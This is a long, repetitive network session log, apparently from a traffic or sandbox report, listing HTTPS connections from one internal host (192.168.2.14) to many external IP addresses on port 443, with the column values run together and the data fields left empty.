                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10758192.168.2.1441716151.139.83.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10759192.168.2.145233079.123.78.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10760192.168.2.1441622166.127.148.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10761192.168.2.1444090202.84.211.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10762192.168.2.1451838118.11.201.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10763192.168.2.145415076.251.169.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10764192.168.2.145413673.33.115.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10765192.168.2.145499257.230.49.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10766192.168.2.145180498.48.251.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10767192.168.2.1458782182.203.173.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10768192.168.2.145572262.118.202.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10769192.168.2.143719252.63.84.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10770192.168.2.143988434.150.207.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10771192.168.2.1458902191.28.58.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10772192.168.2.145902268.13.47.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10773192.168.2.14578688.235.21.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10774192.168.2.1446902161.191.216.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10775192.168.2.1445366103.142.122.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10776192.168.2.1448574180.35.203.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10777192.168.2.145804634.99.196.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10778192.168.2.1444456160.246.142.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10779192.168.2.1451122158.85.26.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10780192.168.2.1443090202.150.86.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10781192.168.2.1447864202.150.87.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10782192.168.2.144828887.24.229.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10783192.168.2.1454296199.122.206.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10784192.168.2.1448758116.121.222.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10785192.168.2.1444478154.170.240.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10786192.168.2.145349077.76.131.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10787192.168.2.145829259.197.232.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10788192.168.2.1441644143.167.17.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10789192.168.2.146057293.61.209.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10790192.168.2.145956851.136.38.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10791192.168.2.143786863.135.167.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10792192.168.2.1437530123.183.189.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10793192.168.2.1437482132.106.60.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10794192.168.2.1459366151.112.116.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10795192.168.2.14571962.123.230.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10796192.168.2.1434604113.166.51.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10797192.168.2.1454582186.82.56.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10798192.168.2.146035463.44.119.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10799192.168.2.145126020.62.86.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10800192.168.2.1450686136.37.39.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10801192.168.2.1433926165.178.179.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10802192.168.2.1445114192.229.253.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10803192.168.2.145597042.26.164.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10804192.168.2.144234878.119.189.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10805192.168.2.1432818216.30.160.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10806192.168.2.14489564.167.42.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10807192.168.2.146038481.153.0.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10808192.168.2.1451192165.149.206.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10809192.168.2.144076292.236.97.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10810192.168.2.143780027.104.212.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10811192.168.2.144666637.228.255.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10812192.168.2.1457984204.50.52.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10813192.168.2.1436236162.60.7.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10814192.168.2.1435802163.151.145.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10815192.168.2.1451362196.92.42.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10816192.168.2.1449844207.182.111.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10817192.168.2.1450958217.146.180.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10818192.168.2.1444844126.249.253.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10819192.168.2.1433934131.212.224.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10820192.168.2.143859484.127.208.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10821192.168.2.1451262190.124.217.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10822192.168.2.145028094.65.140.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10823192.168.2.1441696110.168.247.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10824192.168.2.145861272.26.145.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10825192.168.2.1459392119.241.4.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10826192.168.2.1434398137.100.246.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10827192.168.2.1453912125.128.228.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10828192.168.2.145999248.19.178.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10829192.168.2.1441012123.50.115.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10830192.168.2.145666424.56.19.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10831192.168.2.1439672210.192.42.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10832192.168.2.143721266.235.7.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10833192.168.2.145932290.76.155.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10834192.168.2.1433536201.207.93.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10835192.168.2.145421653.73.199.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10836192.168.2.1448822222.222.170.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10837192.168.2.1440120182.24.207.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10838192.168.2.1434508208.62.58.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10839192.168.2.1456460223.148.195.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10840192.168.2.144578679.34.194.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10841192.168.2.145245844.120.220.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10842192.168.2.1458626191.59.116.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10843192.168.2.1442648182.178.126.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10844192.168.2.1439614138.35.169.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10845192.168.2.1440544163.62.231.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10846192.168.2.1439942103.73.183.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10847192.168.2.1458144130.194.101.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10848192.168.2.1449120166.152.104.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10849192.168.2.1447876153.202.216.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10850192.168.2.1445688154.36.172.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10851192.168.2.1446274180.15.151.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10852192.168.2.1450762170.218.2.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10853192.168.2.1454432212.137.189.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10854192.168.2.1441988129.33.204.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10855192.168.2.144562667.118.191.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10856192.168.2.1445328208.3.104.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10857192.168.2.1460040157.157.117.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10858192.168.2.143824648.64.225.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10859192.168.2.1457104143.152.194.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10860192.168.2.144969435.169.172.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10861192.168.2.14503068.40.19.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10862192.168.2.1445682150.2.126.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10863192.168.2.1441018217.156.99.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10864192.168.2.1452988219.24.216.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10865192.168.2.144507097.17.33.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10866192.168.2.1456956143.231.120.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10867192.168.2.1457096117.136.140.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10868192.168.2.1432912107.109.249.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10869192.168.2.144264466.159.2.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10870192.168.2.1454120137.114.15.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10871192.168.2.144936012.156.28.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10872192.168.2.1453204120.72.24.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10873192.168.2.144067099.137.18.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10874192.168.2.144556844.39.17.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10875192.168.2.145451262.161.190.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10876192.168.2.145220689.146.8.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10877192.168.2.143901042.123.70.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10878192.168.2.144519039.94.131.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10879192.168.2.1453826166.204.143.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10880192.168.2.1446784173.110.156.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10881192.168.2.144253298.208.253.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10882192.168.2.1460928130.167.135.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10883192.168.2.1439664148.0.4.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10884192.168.2.143577848.154.1.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10885192.168.2.144546018.127.223.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10886192.168.2.1448406143.171.178.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10887192.168.2.143485271.33.114.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10888192.168.2.1444200220.124.110.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10889192.168.2.1452774210.25.91.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10890192.168.2.144043067.161.138.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10891192.168.2.145582447.219.175.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10892192.168.2.144217485.70.23.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10893192.168.2.1439006213.23.14.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10894192.168.2.1458596101.252.63.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10895192.168.2.145648454.93.31.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10896192.168.2.1459640145.160.236.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10897192.168.2.1440694222.47.212.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10898192.168.2.1446408120.249.47.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10899192.168.2.1445078202.137.115.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10900192.168.2.143401420.189.126.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10901192.168.2.143699824.64.123.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10902192.168.2.145856272.143.106.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10903192.168.2.144737267.185.89.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10904192.168.2.145050436.62.108.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10905192.168.2.1441622154.102.147.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10906192.168.2.14357868.62.58.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10907192.168.2.143607453.54.7.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10908192.168.2.1438376187.26.238.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10909192.168.2.1434892138.71.104.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10910192.168.2.1434770166.158.185.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10911192.168.2.143519642.136.55.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10912192.168.2.144496640.188.252.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10913192.168.2.1460468208.230.113.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10914192.168.2.1459280105.95.157.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10915192.168.2.1456202113.222.94.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10916192.168.2.145076093.141.116.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10917192.168.2.1449672202.134.149.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10918192.168.2.1445976128.23.166.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10919192.168.2.145242882.18.15.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10920192.168.2.1458076198.190.33.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10921192.168.2.145680619.109.32.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10922192.168.2.145352038.207.24.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10923192.168.2.1438774200.26.36.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10924192.168.2.1453338161.236.81.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10925192.168.2.145116636.109.222.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10926192.168.2.143605823.123.16.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10927192.168.2.145698457.2.78.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10928192.168.2.1441774178.20.180.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10929192.168.2.1438114174.66.252.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10930192.168.2.1435400192.169.107.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10931192.168.2.1449016187.75.75.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10932192.168.2.1451696133.134.172.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10933192.168.2.1455110204.24.72.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10934192.168.2.144014894.42.232.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10935192.168.2.144511850.78.10.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10936192.168.2.1439394114.87.122.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10937192.168.2.144823017.104.74.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10938192.168.2.145162470.252.161.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10939192.168.2.143658475.40.148.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10940192.168.2.144538088.77.169.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10941192.168.2.1457568123.139.83.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10942192.168.2.1447782112.114.1.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10943192.168.2.1439638138.225.11.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10944192.168.2.1445412222.55.59.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10945192.168.2.1450100103.189.243.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10946192.168.2.1444440183.51.213.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10947192.168.2.1433412113.73.196.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10948192.168.2.1457720183.209.45.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10949192.168.2.1459862152.132.97.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10950192.168.2.1451066114.86.115.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10951192.168.2.144589074.195.149.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10952192.168.2.1452330121.150.141.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10953192.168.2.1446056147.123.39.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10954192.168.2.1458310147.162.243.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10955192.168.2.1458198173.133.229.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10956192.168.2.1452830159.66.85.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10957192.168.2.1449220202.163.135.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10958192.168.2.1455676177.158.231.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10959192.168.2.1433410203.239.11.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10960192.168.2.1435080105.196.246.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10961192.168.2.1459674138.255.237.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10962192.168.2.1443506104.145.60.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10963192.168.2.1453492149.236.122.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10964192.168.2.1453412222.72.114.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10965192.168.2.146066077.12.74.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10966192.168.2.144231698.15.204.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10967192.168.2.144117097.67.78.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10968192.168.2.1454298134.210.150.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10969192.168.2.1433456123.190.183.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
